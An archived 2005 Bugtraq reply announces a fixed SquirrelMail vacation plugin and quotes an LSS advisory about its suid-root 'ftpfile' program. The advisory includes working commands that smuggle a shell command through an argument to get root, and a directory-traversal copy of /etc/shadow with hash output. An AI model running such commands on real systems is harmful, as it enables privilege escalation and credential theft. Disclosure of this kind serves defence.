| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <4202F66B.7000408@angrynerds.com> Date: Thu, 03 Feb 2005 20:13:31 -0800 From: p dont think <pdontthink@...rynerds.com> To: LSS Security <exposed@....hr> Cc: bugtraq@...urityfocus.com Subject: Re: Squirrelmail vacation v0.15 local root exploit All, A new release of this plugin that addresses this exploit is now available at: http://www.squirrelmail.org/plugin_view.php?id=51 Due to the severity of the exploits in prior versions, upgrade is highly recommended. Also, please keep in mind that while the SquirrelMail team takes security very seriously, it cannot take full responsibility for the plethora of third-party plugins, of which this is one. LSS team: pleeeease let us know *before* you are going to make your announcement next time. - Paul Lesneiwski > LSS Security Advisory #LSS-2005-01-03 > http://security.lss.hr > > --- > > Title : Squirrelmail vacation v0.15 local root exploit > Advisory ID : LSS-2005-01-03 > Date : 10.01.2005. > Advisory URL: : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03 > Impact : Privilege escalation and arbitrary file read > Risk level : High > Vulnerability type : Local > Vendors contacted : No response from vendor > > > --- > > > > ===[ Overview > > Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply > message to incoming email. That is commonly used to notify the sender of > the receiver's absence. Vacation plugin specifically uses the Vacation program. > Plugin can be downloaded from: > http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz > > > > ===[ Vulnerability > > Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'. > The program is used to access local files in user's home directory. There is > a privilege escalation and arbitrary file read vulnerability in ftpfile. > Command line arguments are passed to execve() function without checking > for meta-characters, therefore making possible execution of commands as root. > > [ljuranic@...top ljuranic]$ id > uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic) > [ljuranic@...top ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id" > /bin/cp: omitting directory `/root/0' > uid=0(root) gid=513(ljuranic) groups=513(ljuranic) > [ljuranic@...top ljuranic]$ > > It is also possible to read restricted files (such as /etc/shadow), since > ftpfile can copy a file from user's home directory to any other > directory without checking file name for directory traversal attack. > > $ ftpfile localhost root root get ../../../../etc/shadow ./shadow > ./shadow[ljuranic@...top ljuranic]$ head ./shadow > root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7::: > bin:*:10929:0:99999:7::: > daemon:*:10929:0:99999:7::: > lp:*:10929:0:99999:7::: > [ljuranic@...top ljuranic]$ > > > > ===[ Affected versions > > Squirrelmail Vacation v0.15 and previous versions. > > > > ===[ Fix > > Not available yet. > > > > ===[ PoC Exploit > > http://security.lss.hr/exploits/ > > > > ===[ Credits > > Credits for this vulnerability goes to Leon Juranic. > > > > ===[ LSS Security Contact > > LSS Security Team, <eXposed by LSS> > > WWW : http://security.lss.hr > E-mail : security@....hr > Tel : +385 1 6129 775 > >
Powered by blists - more mailing lists